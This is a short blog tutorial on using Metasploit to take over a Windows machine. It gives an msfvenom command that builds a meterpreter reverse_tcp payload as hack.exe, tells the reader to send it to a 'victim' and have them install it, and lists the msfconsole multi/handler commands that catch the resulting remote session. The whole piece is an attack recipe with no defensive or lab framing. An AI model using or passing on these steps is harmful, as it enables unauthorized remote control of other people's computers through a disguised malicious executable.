How Hackers Use Metasploit To Hack Windows System

0
metasploit

How hackers use Metasploit to hack windows system

In this article, we will look at how hackers use Metasploit to hack a windows machine. Metasploit framework is the most common framework used by hackers worldwide. It will provide us the reverse connection of the victim (windows machine). So, let’s do it step by step.

Step 1: Open your kali Linux

Step 2: Open your terminal and check for the IP

Step 3: Let’s create a payload using the command

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.184.129 LPORT=1337 – platform windows-a x86 -f exe -o /root/Desktop/hack.exe

Step 4: Payload created now send it to the victim

Step 5: Let the victim install the payload

Step 6: Back to Kali Linux and open new terminal and open msfconsole using command msfconsole

Step 7: use commands:-

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost = 192.168.184.129

set lport = 1337

exploit

You got the session !!!!!

 

 

About Author

Leave a Reply

Your email address will not be published. Required fields are marked *

Open chat
Hello
Can we help you?